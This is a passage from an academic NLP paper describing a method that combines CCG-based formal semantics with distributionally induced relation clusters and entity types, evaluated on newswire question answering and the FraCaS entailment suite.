identifiers. Where standard se- mantic formalisms would map the verb write to a write’ symbol, we map it to a cluster identifier such as relation37, which the noun author may also map to. This mapping is learnt by offline clustering. Unlike previous distributional approaches, we perform clustering at the level of predicate-argument structure, rather than syntactic dependency struc- ture. This means that we abstract away from many syntactic differences that are not present in the se- mantics, such as conjunctions, passives, relative clauses, and long-range dependencies. This signifi- cantly reduces sparsity, so we have fewer predicates to cluster and more observations for each. Of course, many practical inferences rely heavily on background knowledge about the world—such knowledge falls outside the scope of this work. 2 Background Our approach is based on Combinatory Categorial Grammar (CCG; Steedman, 2000), a strongly lexi- calised theory of language in which lexical entries for words contain all language-specific information. The lexical entry for each word contains a syntactic category, which determines which other categories the word may combine with, and a semantic inter- pretation, which defines the compositional seman- tics. For example, the lexicon may contain the entry: write ` (S\NP)/NP : λ yλ x.write′(x,y) Crucially, there is a transparent interface between the syntactic category and the semantics. For ex- ample the transitive verb entry above defines the verb syntactically as a function mapping two noun- phrases to a sentence, and semantically as a bi- nary relation between its two argument entities. This means that it is relatively straightforward to deterministically map parser output to a logical form, as in the Boxer system (Bos, 2008). This Every dog barks NP↑/N N S\NP λ pλ q.∀x[p(x) =⇒ q(x)] λ x.dog′(x) λ x.bark′(x) > NP↑ λ q.∀x[dog′(x) =⇒ q(x)] > S ∀x[dog′(x) =⇒ bark′(x)] Figure 1: A standard logical form derivation using CCG. The NP↑ notation means that the subject is type-raised, and taking the verb-phrase as an argument—so is an ab- breviation of S/(S\NP). This is necessary in part to sup- port a correct semantics for quantifiers. Input Sentence Shakespeare wrote Macbeth ⇓ Intial semantic analysis writearg0,arg1(shakespeare, macbeth) ⇓ Entity Typing writearg0:PER,arg1:BOOK (shakespeare:PER, macbeth:BOOK) ⇓ Distributional semantic analysis relation37(shakespeare:PER, macbeth:BOOK) Figure 2: Layers used in our model. form of semantics captures the underlying predicate- argument structure, but fails to license many impor- tant inferences—as, for example, write and author do not map to the same predicate. In addition to the lexicon, there is a small set of binary combinators and unary rules, which have a syntactic and semantic interpretation. Figure 1 gives an example CCG derivation. 3 Overview of Approach We attempt to learn a CCG lexicon which maps equivalent words onto the same logical form—for example learning entries such as: author ` N/PP[o f ] : λ xλ y.relation37(x,y) write ` (S\NP)/NP : λ xλ y.relation37(x,y) The only change to the standard CCG derivation is that the symbols used in the logical form are arbi- trary relation identifiers. We learn these by first map- ping to a deterministic logical form (using predicates 180 such as author’ and write’), using a process simi- lar to Boxer, and then clustering predicates based on their arguments. This lexicon can then be used to parse new sentences, and integrates seamlessly with CCG theories of formal semantics. Typing predicates—for example, determining that writing is a relation between people and books— has become standard in relation clustering (Schoen- mackers et al., 2010; Berant et al., 2011; Yao et al., 2012). We demonstate how to build a typing model into the CCG derivation, by subcategorizing all terms representing entities in the logical form with a more detailed type. These types are also in- duced from text, as explained in Section 5, but for convenience we describe them with human-readable labels, such as PER, LOC and BOOK. A key advantage of typing is that it allows us to model ambiguous predicates. Following Berant et al. (2011), we assume that different type signatures of the same predicate have different meanings, but given a type signature a predicate is unambiguous. For example a different lexical entry for the verb born is used in the contexts Obama was born in Hawaii and Obama was born in 1961, reflecting a distinction in the semantics that is not obvious in the syntax1. Typing also greatly improves the efficiency of clustering, as we only need to compare predicates with the same type during clustering (for example, we do not have to consider clustering a predicate between people and places with predicates between people and dates). In this work, we focus on inducing binary rela- tions. Many existing approaches have shown how to produce good clusterings of (non-event) nouns (Brown et al., 1992), any of which could be sim- ply integrated into our semantics—but relation clus- tering remains an open problem (see Section 9). N-ary relations are binarized, by creating a bi- nary relation between each pair of arguments. For example, for the sentence Russia sold Alaska to the United States, the system creates three binary relations— corresponding to sellToSomeone(Russia, Alaska), buyFromSomeone(US, Alaska), sellSome- thingTo(Russia, US). This transformation does not 1Whilst this assumption is very useful, it does not always hold— for example, the genitive in Shakespeare’s book is ambigu- ous between ownership and authorship relations even given the types of the arguments. exactly preserve meaning, but still captures the most important relations. Note that this allows us to compare semantic relations across different syntac- tic types—for example, both transitive verbs and argument-taking nouns can be seen as expressing bi- nary semantic relations between entities. Figure 2 shows the layers used in our model. 4 Initial Semantic Analysis The initial semantic analysis maps parser output onto a logical form, in a similar way to Boxer. The semantic formalism is based on Steedman (2012). The first step is syntactic parsing. We use the C&C parser (Clark and Curran, 2004), trained on CCGBank (Hockenmaier and Steedman, 2007), us- ing the refined version of Honnibal et al. (2010) which brings the syntax closer to the predicate- argument structure. An automatic post-processing step makes a number of minor changes to the parser output, which converts the grammar into one more suitable for our semantics. PP (prepositional phrase) and PR (phrasal verb complement) categories are sub-categorised with the relevant preposition. Noun compounds with the same MUC named-entity type (Chinchor and Robinson, 1997) are merged into a single non-compositional node2 (we otherwise ig- nore named-entity types). All argument NPs and PPs are type-raised, allowing us to represent quanti- fiers. All prepositional phrases are treated as core ar- guments (i.e. given the category PP, not adjunct cat- egories like (N\N)/NP or ((S\NP)\(S\NP))/NP), as it is difficult for the parser to distinguish argu- ments and adjuncts. Initial semantic lexical entries for almost all words can be generated automatically from the syntactic category and POS tag (obtained from the parser), as the syntactic category captures the underlying predicate-argument structure. We use a Davidsonian-style representation of arguments (Davidson, 1967), which we binarize by creating a separate predicate for each pair of arguments of a word. These predicates are labelled with the lemma of the head word and a Propbank-style argument key (Kingsbury and Palmer, 2002), e.g. arg0, argIn. We distinguish noun and verb predicates based on POS 2For example, this allows us to give Barack Obama the seman- tics λ x.barack obama(x) instead of λ x.barack(x)∧obama(x), which is more convenient for collecting distributional statistics. 181 Word Category Semantics Automatic author N/PP[o f ] λ xλ y.authorarg0,argOf (y,x) write (S\NP)/NP λ xλ y.writearg0,arg1(y,x) Manual every NP↑/N λ pλ q.∀x[p(x)→ q(x)] not (S\NP)/(S\NP) λ pλ x.¬p(x) Figure 3: Example initial lexical entries tag—so, for example, we have different predicates for effect as a noun or verb. This algorithm can be overridden with man- ual lexical entries for specific closed-class function words. Whilst it may be possible to learn these from data, our approach is pragmatic as there are relatively few such words, and the complex logical forms required would be difficult to induce from dis- tributional statistics. We add a small number of lexi- cal entries for words such as negatives (no, not etc.), and quantifiers (numbers, each, every, all, etc.). Some example initial lexical entries are shown in Figure 3. 5 Entity Typing Model Our entity-typing model assigns types to nouns, which is useful for disambiguating polysemous predicates. Our approach is similar to O’Seaghdha (2010) in that we aim to cluster entities based on the noun and unary predicates applied to them (it is simple to convert from the binary predicates to unary predicates). For example, we want the pair (bornargIn, 1961) to map to a DAT type, and (bornargIn, Hawaii) to map to a LOC type. This is non-trivial, as both the predicates and arguments can be ambiguous between multiple types—but topic models offer a good solution (described below). 5.1 Topic Model We assume that the type of each argument of a pred- icate depends only on the predicate and argument, although Ritter et al. (2010) demonstrate an advan- tage of modelling the joint probability of the types of multiple arguments of the same predicate. We use the standard Latent Dirichlet Allocation model (Blei et al., 2003), which performs comparably to more complex models proposed in O’Seaghdha (2010). In topic-modelling terminology, we construct a document for each unary predicate (e.g. bornargIn), based on all of its argument entities (words). We as- sume that these arguments are drawn from a small number of types (topics), such as PER, DAT or LOC3. Each type j has a multinomial distribution φ j over arguments (for example, a LOC type is more likely to generate Hawaii than 1961). Each unary predicate i has a multinomial distribution θi over topics, so the bornargIn predicate will normally gen- erate a DAT or LOC type. Sparse Dirichlet priors α and β on the multinomials bias the distributions to be peaky. The parameters are estimated by Gibbs sampling, using the Mallet implementation (McCal- lum, 2002). The generative story to create the data is: For every type k: Draw the p(arg|k) distribution φk from Dir(β ) For every unary predicate i: Draw the p(type|i) distribution θi from Dir(α) For every argument j: Draw a type zi j from Mult(θi) Draw an argument wi j from Mult(φθi) 5.2 Typing in Logical Form In the logical form, all constants and variables repre- senting entities x can be assigned a distribution over types px(t) using the type model. An initial type distribution is applied in the lexicon, using the φ distributions for the types of nouns, and the θi dis- tributions for the type of arguments of binary predi- cates (inverted using Bayes’ rule). Then at each β - reduction in the derivation, we update probabilities of the types to be the product of the type distribu- tions of the terms being reduced. If two terms x and 3Types are induced from the text, but we give human-readable labels here for convenience. 182 file a suit (S\NP)/NP NP↑ λ y : { DOC =0.5 LEGAL =0.4 CLOTHES =0.01 ... } λ x : { PER = 0.7 ORG = 0.2 ... } . f ilearg0,arg1(x,y) λ p.∃y : { CLOTHES = 0.6 LEGAL = 0.3 DOC =0.001 ... } [suit′(y)∧ p(y)] < S\NP λ x : { PER = 0.7 ORG = 0.2 ... } ∃y : { LEGAL = 0.94 CLOTHES = 0.05 DOC = 0.004 ... } )[suit′(y)∧ f ilearg0,arg1(x,y)] Figure 4: Using the type model for disambiguation in the derivation of file a suit. Type distributions are shown after the variable declarations. Both suit and the object of file are lexically ambiguous between different types, but after the β -reduction only one interpretation is likely. If the verb were wear, a different interpretation would be preferred. y combine to a term z: pz(t) = px(t)py(t) ∑ t′ px(t′)py(t′) For example, in wore a suit and file a suit, the vari- able representing suit may be lexically ambiguous between CLOTHES and LEGAL types, but the vari- ables representing the objects of wear and f ile will have preferences that allow us to choose the correct type when the terms combine. Figure 4 shows an example derivation using the type model for disam- biguation4. 6 Distributional Relation Clustering Model The typed binary predicates can be grouped into clusters, each of which represents a dis- tinct semantic relation. Note that because we cluster typed predicates, bornarg0:PER,argIn:LOC and bornarg0:PER,argIn:DAT can be clustered separately. 6.1 Corpus statistics Typed binary predicates are clustered based on the expected number of times they hold between each argument-pair in the corpus. This means we cre- ate a single vector of argument-pair counts for each predicate (not a separate vector for each argument). For example, the vector for the typed predicate writearg0:PER,arg1:BOOK may contain non-zero counts for entity-pairs such as (Shakespeare, Macbeth), (Dickens, Oliver Twist) and (Rowling, Harry Potter). 4Our implementation follows Steedman (2012) in using Gener- alized Skolem Terms rather than existential quantifiers, in order to capture quantifier scope alternations monotonically, but we omit these from the example to avoid introducing new notation. The entity-pair counts for authorarg0:PER,argOf :BOOK may be similar, on the assumption that both are sam- ples from the same underlying semantic relation. To find the expected number of occurrences of argument-pairs for typed binary predicates in a cor- pus, we first apply the type model to the derivation of each sentence, as described in Section 5.2. This outputs untyped binary predicates, with distributions over the types of their arguments. The type of the predicate must match the type of its arguments, so the type distribution of a binary predicate is simply the joint distribution of the two argument type dis- tributions. For example, if the arguments in a bornarg0,argIn(obama,hawaii) derivation have the respective type distributions (PER=0.9, LOC=0.1) and (LOC=0.7, DAT=0.3), the distribution over bi- nary typed predicates is (bornarg0:PER,argIn:LOC=0.63, bornarg0:PER,argIn:DAT =0.27, etc.) The expected counts for (obama,hawaii) in the vectors for bornarg0:PER,argIn:LOC and bornarg0:PER,argIn:DAT are then incremented by these probabilities. 6.2 Clustering Many algorithms have been proposed for cluster- ing predicates based on their arguments (Poon and Domingos, 2009; Yao et al., 2012). The number of relations in the corpus is unbounded, so the cluster- ing algorithm should be non-parametric. It is also important that it remains tractable for very large numbers of predicates and arguments, in order to give us a greater coverage of language than can be achieved by hand-built ontologies. We cluster the typed predicate vectors using the Chinese Whispers algorithm (Biemann, 2006)— 183 although somewhat ad-hoc, it is both non-parametric and highly scalable5. This has previously been used for noun-clustering by Fountain and Lapata (2011), who argue it is a cognitively plausible model for language acquisition. The collection of predicates and arguments is converted into a graph with one node per predicate, and edge weights representing the similarity between predicates. Predicates with different types have zero-similarity, and otherwise similarity is computed as the cosine-similarity of the tf-idf vectors of argument-pairs. We prune nodes oc- curring fewer than 20 times, edges with weights less than 10−3, and a short list of stop predicates. The algorithm proceeds as follows: 1. Each predicate p is assigned to a different se- mantic relation rp 2. Iterate over the predicates p in a random order 3. Set rp = arg max r ∑p′ 1r=rp′ sim(p, p ′), where sim(p, p′) is the distributional similarity be- tween p and p′, and 1r=r′ is 1 iff r=r’ and 0 otherwise. 4. Repeat (2.) to convergence. 7 Semantic Parsing using Relation Clusters The final phase is to use our relation clusters in the lexical entries of the CCG semantic derivation. This is slightly complicated by the fact that our predi- cates are lexically ambiguous between all the pos- sible types they could take, and hence the relations they could express. For example, the system can- not tell whether born in is expressing a birthplace or birthdate relation until later in the derivation, when it combines with its arguments. However, all the possible logical forms are identical except for the symbols used, which means we can produce a packed logical form capturing the full distribution over logical forms. To do this, we make the predi- cate a function from argument types to relations. For each word, we first take the lexical semantic definition produced by the algorithm in Section 4. For binary predicates in this definition (which will 5We also experimented with a Dirichlet Process Mixture Model (Neal, 2000), but even with the efficient A* search algorithms introduced by Daumé III (2007), the cost of inference was found to be prohibitively high when run at large scale. be untyped), we perform a deterministic lookup in the cluster model learned in Section 6, using all pos- sible corresponding typed predicates. This allows us to represent the binary predicates as packed predi- cates: functions from argument types to relations. For example, if the clustering maps bornarg0:PER,argIn:LOC to rel49 (“birthplace”) and bornarg0:PER,argIn:DAT to rel53 (“birthdate”), our lexicon contains the following packed lexical entry (type-distributions on the variables are suppressed): born ` (S\NP)/PP[in] : λ yλ x. { (x : PER,y : LOC)⇒rel49 (x : PER,y : DAT)⇒rel53 } (x,y) The distributions over argument types then imply a distribution over relations. For example, if the packed-predicate for bornarg0,argIn is applied to ar- guments Obama and Hawaii, with respective type distributions (PER=0.9, LOC=0.1) and (LOC=0.7, DAT=0.3)6, the distribution over relations will be (rel49=0.63, rel53=0.27, etc.). If 1961 has a type-distribution (LOC=0.1, DAT=0.9), the output packed-logical form for Obama was born in Hawaii in 1961 will be:    rel49=0.63 rel53=0.27 ...   (ob,hw)∧    rel49=0.09 rel53=0.81 ...   (ob,1961) The probability of a given logical form can be read from this packed logical form. 8 Experiments Our approach aims to offer a strong model of both formal and lexical semantics. We perform two eval- uations, aiming to target each of these separately, but using the same semantic representations in each. We train our system on Gigaword (Graff et al., 2003), which contains around 4 billion words of newswire. The type-model is trained using 15 types7, and 5,000 iterations of Gibbs sampling (us- ing the distributions from the final sample). Table 1 6These distributions are composed from the type-distributions for both the predicate and argument, as explained in Section 5 7This number was chosen by examination of models trained with different numbers of types. The algorithm produces se- mantically coherent clusters for much larger numbers of types, but many of these are fine-grained categories of people, which introduces sparsity in the relation clustering. 184 Type Top Words 1 suspect, assailant, fugitive, accomplice 2 author, singer, actress, actor, dad 5 city, area, country, region, town, capital 8 subsidiary, automaker, airline, Co., GM 10 musical, thriller, sequel, special Table 1: Most probable terms in some clusters induced by the Type Model. shows some example types. The relation clustering uses only proper nouns, to improve precision (spar- sity problems are partly offset by the large input cor- pus). Aside from parsing, the pipeline takes around a day to run using 12 cores. 8.1 Question Answering Experiments As yet, there is no standard way of evaluating lexical semantics. Existing tasks like Recognising Textual Entailment (RTE; Dagan et al., 2006) rely heavily on background knowledge, which is beyond the scope of this work. Intrinsic evaluations of entailment rela- tions have low inter-annotator agreement (Szpektor et al., 2007), due to the difficulty of evaluating rela- tions out of context. Our evaluation is based on that performed by Poon and Domingos (2009). We automatically con- struct a set of questions by sampling from text, and then evaluate how many answers can be found in a different corpus. From dependency-parsed newswire, we sample either X nsub j← verbdob j→ Y, Xnsub j← verb pob j→ Y or Xnsub j← be dob j→ nounpob j→ Y patterns, where X and Y are proper nouns and the verb is not on a list of stop verbs, and deterministically con- vert these to questions. For example, from Google bought YouTube we create the questions What did Google buy? and What bought YouTube?. The task is to find proper-noun answers to these questions in a different corpus, which are then evaluated by hu- man annotators based on the sentence the answer was retrieved from8. Systems can return multiple 8Common nouns are filtered automatically. To focus on evalu- ating the semantics, annotators ignored garbled sentences due to errors pre-processing the corpus (these are excluded from the results). We also automatically exclude weekday and month answers, which are overwhelmingly syntax errors for all systems—e.g. treating Tuesday as an object in Obama an- nounced Tuesday that... answers to the same question (e.g. What did Google buy? may have many valid answers), and all of these contribute to the result. As none of the systems model tense or temporal semantics, annotators were instructed to annotate answers as correct if they were true at any time. This approach means we evaluate on relations in proportion to corpus frequency. We sample 1000 questions from the New York Times subset of Gigaword from 2010, and search for an- swers in the New York Times from 2009. We evaluate the following approaches: • CCG-Baseline The logical form produced by our CCG derivation, without the clustering. • CCG-WordNet The CCG logical form, plus WordNet as a model of lexical semantics. • CCG-Distributional The logical form includ- ing the type model and clusters. • Relational LDA An LDA based model for clustering dependency paths (Yao et al., 2011). We train on New York Times subset of Giga- word9, using their setup of 50 iterations with 100 relation types. • Reverb A sophisticated Open Information Ex- traction system (Fader et al., 2011). Unsupervised Semantic Parsing (USP; Poon and Domingos, 2009; USP; Poon and Domingos, 2010; USP; Titov and Klementiev, 2011) would be another obvious baseline. However, memory requirements mean it is not possible to run at this scale (our system is trained on 4 orders of magnitude more data than the USP evaluation). Yao et al. (2011) found it had comparable performance to Relational LDA. For the CCG models, rather than performing full first-order inference on a large corpus, we simply test whether the question predicate subsumes a can- didate answer predicate, and whether the arguments match10. In the case of CCG-Distributional, we cal- culate the probability that the two packed-predicates 9This is around 35% of Gigaword, and was the largest scale possible on our resources. 10We do this as it is much more efficient than full first-order theorem-proving. We could in principle make additional in- ferences with theorem-proving, such as answering What did Google buy? from Google bought the largest video website and YouTube is the largest video website. 185 System Answers Correct Relational-LDA 7046 11.6% Reverb 180 89.4% CCG-Baseline 203 95.8% CCG-WordNet 211 94.8% CCG-Distributional@250 250 94.1% CCG-Distributional@500 500 82.0% Table 2: Results on wide-coverage Question Answer- ing task. CCG-Distributional ranks question/answer pairs by confidence—@250 means we evaluate the top 250 of these. It is not possible to give a recall figure, as the total number of correct answers in the corpus is unknown. are in the same cluster, marginalizing over their ar- gument types. Answers are ranked by this proba- bility. For CCG-WordNet, we check if the ques- tion predicate is a hypernym of the candidate answer predicate (using any WordNet sense of either term). Results are shown in Table 2. Relational-LDA in- duces many meaningful clusters, but predicates must be assigned to one of 100 relations, so results are dominated by large, noisy clusters (it is not possi- ble to take the N-best answers as the cluster assign- ments do not have a confidence score). The CCG- Baseline errors are mainly caused by parser errors, or relations in the scope of non-factive operators. CCG-WordNet adds few answers to CCG-Baseline, reflecting the limitations of hand-built ontologies. CCG-Distributional substantially improves recall over other approaches whilst retaining good preci- sion, demonstrating that we have learnt a powerful model of lexical semantics. Table 3 shows some correctly answered questions. The system improves over the baseline by mapping expressions such as merge with and acquisition of to the same relation cluster. Many of the errors are caused by conflating predicates where the entailment only holds in one direction, such as was elected to with ran for. Hier- archical clustering could be used to address this. 8.2 Experiments on the FraCaS Suite We are also interested in evaluating our approach as a model of formal semantics—demonstrating that it is possible to integrate the formal semantics of Steedman (2012) with our distributional clusters. The FraCaS suite (Cooper et al., 1996)11 contains a hand-built set of entailment problems designed to be challenging in terms of formal semantics. We use Section 1, which contains 74 problems requiring an understanding of quantifiers12. They do not re- quire any knowledge of lexical semantics, meaning we can evaluate the formal component of our system in isolation. However, we use the same representa- tions as in our previous experiment, even though the clusters provide no benefit on this task. Figure 5 gives an example problem. The only previous work we are aware of on this dataset is by MacCartney and Manning (2007). This approach learns the monotonicity properties of words from a hand-built training set, and uses this to transform a sentence into a polarity anno- tated string. The system then aims to transform the premise string into a hypothesis. Positively polar- ized words can be replaced with less specific ones (e.g. by deleting adjuncts), whereas negatively po- larized words can be replaced with more specific ones (e.g. by adding adjuncts). Whilst this is high- precision and often useful, this logic is unable to per- form inferences with multiple premise sentences (in contrast to our first-order logic). Development consists of adding entries to our lex- icon for quantifiers. For simplicity, we treat multi- word quantifiers like at least a few, as being multi- word expressions—although a more compositional analysis may be possible. Following MacCartney and Manning (2007), we do not use held-out data— each problem is designed to test a different issue, so it is not possible to generalize from one subset of the suite to another. As we are interested in evaluating the semantics, not the parser, we manually supply gold-standard lexical categories for sentences with parser errors (any syntactic mistake causes incorrect semantics). Our derivations produce a distribution over logical forms—we license the inference if it holds in any interpretation with non-zero probabil- ity. We use the Prover9 (McCune, 2005) theorem prover for inference, returning yes if the premise im- plies the hypothesis, no if it implies the negation of the hypothesis, and unknown otherwise. Results are shown in Table 4. Our system im- 11We use the version converted to machine readable format by MacCartney and Manning (2007) 12Excluding 6 problems without a defined solution. 186 Question Answer Sentence What did Delta merge with? Northwest The 747 freighters came with Delta’s acquisition of Northwest What spoke with Hu Jintao? Obama Obama conveyed his respect for the Dalai Lama to China’s president Hu Jintao during their first meeting. . . What arrived in Colorado? Zazi Zazi flew back to Colorado. . . What ran for Congress? Young . . . Young was elected to Congress in 1972 Table 3: Example questions correctly answered by CCG-Distributional. Premises: Every European has the right to live in Europe. Every European is a person. Every person who has the right to live in Europe can travel freely within Europe. Hypothesis: Every European can travel freely within Europe Solution: Yes Figure 5: Example problem from the FraCaS suite. System Single Multiple Premise Premises MacCartney&Manning 07 84% - MacCartney&Manning 08 98% - CCG-Dist (parser syntax) 70% 50% CCG-Dist (gold syntax) 89% 80% Table 4: Accuracy on Section 1 of the FraCaS suite. Problems are divided into those with one premise sen- tence (44) and those with multiple premises (30). proves on previous work by making multi-sentence inferences. Causes of errors include missing a dis- tinct lexical entry for plural the, only taking existen- tial interpretations of bare plurals, failing to inter- pret mass-noun determiners such as a lot of, and not providing a good semantics for non-monotone de- terminers such as most. We believe these problems will be surmountable with more work. Almost all er- rors are due to incorrectly predicting unknown — the system makes just one error on yes or no predictions (with or without gold syntax). This suggests that making first-order logic inferences in applications will not harm precision. We are less robust than MacCartney and Manning (2007) to syntax errors but, conversely, we are able to attempt more of the problems (i.e. those with multi-sentence premises). Other approaches based on distributional semantics seem unable to tackle any of these problems, as they do not represent quantifiers or negation. 9 Related Work Much work on semantics has taken place in a su- pervised setting—for example the GeoQuery (Zelle and Mooney, 1996) and ATIS (Dahl et al., 1994) se- mantic parsing tasks. This approach makes sense for generating queries for a specific database, but means the semantic representations do not generalize to other datasets. There have been several attempts to annotate larger corpora with semantics—such as Ontonotes (Hovy et al., 2006) or the Groningen Meaning Bank (Basile et al., 2012). These typically map words onto senses in ontologies such as Word- Net, VerbNet (Kipper et al., 2000) and FrameNet (Baker et al., 1998). However, limitations of these ontologies mean that they do not support inferences such as X is the author of Y → X wrote Y. Given the difficulty of annotating large amounts of text with semantics, various approaches have at- tempted to learn meaning without annotated text. Distant Supervision approaches leverage existing knowledge bases, such as Freebase (Bollacker et al., 2008), to learn semantics (Mintz et al., 2009; Krish- namurthy and Mitchell, 2012). Dependency-based Compositional Semantics (Liang et al., 2011) learns the meaning of questions by using their answers as denotations—but this appears to be specific to ques- tion parsing. Such approaches can only learn the pre-specified relations in the knowledge base. The approaches discussed so far in this section have all attempted to map language onto some pre- 187 specified set of relations. Various attempts have been made to instead induce relations from text by clustering predicates based on their arguments. For example, Yao et al. (2011) propose a series of LDA- based models which cluster relations between en- tities based on a variety of lexical, syntactic and semantic features. Unsupervised Semantic Pars- ing (Poon and Domingos, 2009) recursively clusters fragments of dependency trees based on their argu- ments. Although USP is an elegant model, it is too computationally expensive to run on large corpora. It is also based on frame semantics, so does not clus- ter equivalent predicates with different frames. To our knowledge, our work is the first such approach to be integrated within a linguistic theory supporting formal semantics for logical operators. Vector space models represent words by vectors based on co-occurrence counts. Recent work has tackled the problem of composing these matrices to build up the semantics of phrases or sentences (Mitchell and Lapata, 2008). Another strand (Co- ecke et al., 2010; Grefenstette et al., 2011) has shown how to represent meanings as tensors, whose order depends on the syntactic category, allowing an elegant correspondence between syntactic and semantic types. Socher et al. (2012) train a com- position function using a neural network—however their method requires annotated data. It is also not obvious how to represent logical relations such as quantification in vector-space models. Baroni et al. (2012) make progress towards this by learning a classifier that can recognise entailments such as all dogs =⇒ some dogs, but this remains some way from the power of first-order theorem proving of the kind required by the problem in Figure 5. An alternative strand of research has attempted to build computational models of linguistic theories based on formal compositional semantics, such as the CCG-based Boxer (Bos, 2008) and the LFG- based XLE (Bobrow et al., 2007). Such approaches convert parser output into formal semantic repre- sentations, and have demonstrated some ability to model complex phenomena such as negation. For lexical semantics, they typically compile lexical re- sources such as VerbNet and WordNet into inference rules—but still achieve only low recall on open- domain tasks, such as RTE, mostly due to the low coverage of such resources. Garrette et al. (2011) use distributional statistics to determine the proba- bility that a WordNet-derived inference rule is valid in a given context. Our approach differs in that we learn inference rules not present in WordNet. Our lexical semantics is integrated into the lexicon, rather than being implemented as additional infer- ence rules, meaning that inference is more efficient, as equivalent statements have the same logical form. Natural Logic (MacCartney and Manning, 2007) offers an interesting alternative to symbolic logics, and has been shown to be able to capture complex logical inferences by simply identifying the scope of negation in text. This approach achieves similar pre- cision and much higher recall than Boxer on the RTE task. Their approach also suffers from such limita- tions as only being able to make inferences between two sentences. It is also sensitive to word order, so cannot make inferences such as Shakespeare wrote Macbeth =⇒ Macbeth was written by Shakespeare. 10 Conclusions and Future Work This is the first work we are aware of that combines a distributionally induced lexicon with formal seman- tics. Experiments suggest our approach compares favourably with existing work in both areas. Many potential areas for improvement remain. Hierachical clustering would allow us to capture hypernym relations, rather than the synonyms cap- tured by our flat clustering. There is much potential for integrating existing hand-built resources, such as Ontonotes and WordNet, to improve the accu- racy of clustering. There are cases where the ex- isting CCGBank grammar does not match the re- quired predicate-argument structure—for example in the case of light verbs. It may be possible to re- bank CCGBank, in a way similar to Honnibal et al. (2010), to improve it on this point. Acknowledgements We thank Christos Christodoulopoulos, Tejaswini Deoskar, Mark Granroth-Wilding, Ewan Klein, Ka- trin Erk, Johan Bos and the anonymous reviewers for their helpful comments, and Limin Yao for shar- ing code. This work was funded by ERC Advanced Fellowship 249520 GRAMPLUS and IP EC-FP7- 270273 Xperience. 188 References C.F. Baker, C.J. Fillmore, and J.B. Lowe. 1998. The berkeley framenet project. In Proceedings of the 36th Annual Meeting of the Association for Computa- tional Linguistics and 17th International Conference on Computational Linguistics-Volume 1, pages 86–90. Association for Computational Linguistics. M. Baroni, R. Bernardi, N.Q. Do, and C. Shan. 2012. Entailment above the word level in distributional se- mantics. In Proceedings of EACL, pages 23–32. Cite- seer. V. Basile, J. Bos, K. Evang, and N. Venhuizen. 2012. Developing a large semantically annotated corpus. In Proceedings of the Eighth International Conference on Language Resources and Evaluation (LREC12). To appear. Jonathan Berant, Ido Dagan, and Jacob Goldberger. 2011. Global learning of typed entailment rules. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies - Volume 1, HLT ’11, pages 610– 619. Association for Computational Linguistics. C. Biemann. 2006. Chinese whispers: an efficient graph clustering algorithm and its application to natural lan- guage processing problems. In Proceedings of the First Workshop on Graph Based Methods for Natural Language Processing, pages 73–80. Association for Computational Linguistics. D.M. Blei, A.Y. Ng, and M.I. Jordan. 2003. Latent dirichlet allocation. the Journal of machine Learning research, 3:993–1022. D. G. Bobrow, C. Condoravdi, R. Crouch, V. De Paiva, L. Karttunen, T. H. King, R. Nairn, L. Price, and A. Zaenen. 2007. Precision-focused textual inference. In Proceedings of the ACL-PASCAL Workshop on Tex- tual Entailment and Paraphrasing, RTE ’07, pages 16–21. Association for Computational Linguistics. Kurt Bollacker, Colin Evans, Praveen Paritosh, Tim Sturge, and Jamie Taylor. 2008. Freebase: a col- laboratively created graph database for structuring hu- man knowledge. In Proceedings of the 2008 ACM SIGMOD international conference on Management of data, SIGMOD ’08, pages 1247–1250, New York, NY, USA. ACM. J. Bos and K. Markert. 2005. Recognising textual en- tailment with logical inference. In Proceedings of the conference on Human Language Technology and Empirical Methods in Natural Language Processing, pages 628–635. Association for Computational Lin- guistics. Johan Bos. 2008. Wide-coverage semantic analysis with boxer. In Johan Bos and Rodolfo Delmonte, editors, Semantics in Text Processing. STEP 2008 Conference Proceedings, Research in Computational Semantics, pages 277–286. College Publications. P.F. Brown, P.V. Desouza, R.L. Mercer, V.J.D. Pietra, and J.C. Lai. 1992. Class-based n-gram models of natural language. Computational linguistics, 18(4):467–479. N. Chinchor and P. Robinson. 1997. Muc-7 named entity task definition. In Proceedings of the 7th Conference on Message Understanding. Stephen Clark and James R. Curran. 2004. Parsing the WSJ using CCG and log-linear models. In Proceed- ings of the 42nd Annual Meeting on Association for Computational Linguistics, ACL ’04. Association for Computational Linguistics. Bob Coecke, Mehrnoosh Sadrzadeh, and Stephen Clark. 2010. Mathematical foundations for a compositional distributional model of meaning. Linguistic Analysis: A Festschrift for Joachim Lambek, 36(1-4):345–384. Robin Cooper, Dick Crouch, Jan Van Eijck, Chris Fox, Johan Van Genabith, Jan Jaspars, Hans Kamp, David Milward, Manfred Pinkal, Massimo Poesio, et al. 1996. Using the framework. FraCaS Deliverable D, 16. Ido Dagan, O. Glickman, and B. Magnini. 2006. The PASCAL recognising textual entailment challenge. Machine Learning Challenges. Evaluating Predictive Uncertainty, Visual Object Classification, and Recog- nising Tectual Entailment, pages 177–190. D.A. Dahl, M. Bates, M. Brown, W. Fisher, K. Hunicke- Smith, D. Pallett, C. Pao, A. Rudnicky, and E. Shriberg. 1994. Expanding the scope of the ATIS task: The ATIS-3 corpus. In Proceedings of the work- shop on Human Language Technology, pages 43–48. Association for Computational Linguistics. Hal Daumé III. 2007. Fast search for dirichlet process mixture models. In Proceedings of the Eleventh In- ternational Conference on Artificial Intelligence and Statistics (AIStats), San Juan, Puerto Rico. D. Davidson. 1967. 6. the logical form of action sen- tences. Essays on actions and events, 1(9):105–149. Anthony Fader, Stephen Soderland, and Oren Etzioni. 2011. Identifying relations for open information extraction. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, EMNLP ’11, pages 1535–1545. Association for Com- putational Linguistics. T. Fountain and M. Lapata. 2011. Incremental models of natural language category acquisition. In Proceedings of the 32st Annual Conference of the Cognitive Science Society. D. Garrette, K. Erk, and R. Mooney. 2011. Integrating logical representations with probabilistic information using markov logic. In Proceedings of the Ninth In- ternational Conference on Computational Semantics, 189 pages 105–114. Association for Computational Lin- guistics. D. Graff, J. Kong, K. Chen, and K. Maeda. 2003. English gigaword. Linguistic Data Consortium, Philadelphia. Edward Grefenstette, Mehrnoosh Sadrzadeh, Stephen Clark, Bob Coecke, and Stephen Pulman. 2011. Con- crete sentence spaces for compositional distributional models of meaning. Computational Semantics IWCS 2011, page 125. Julia Hockenmaier and Mark Steedman. 2007. CCG- bank: a corpus of CCG derivations and dependency structures extracted from the penn treebank. Compu- tational Linguistics, 33(3):355–396. M. 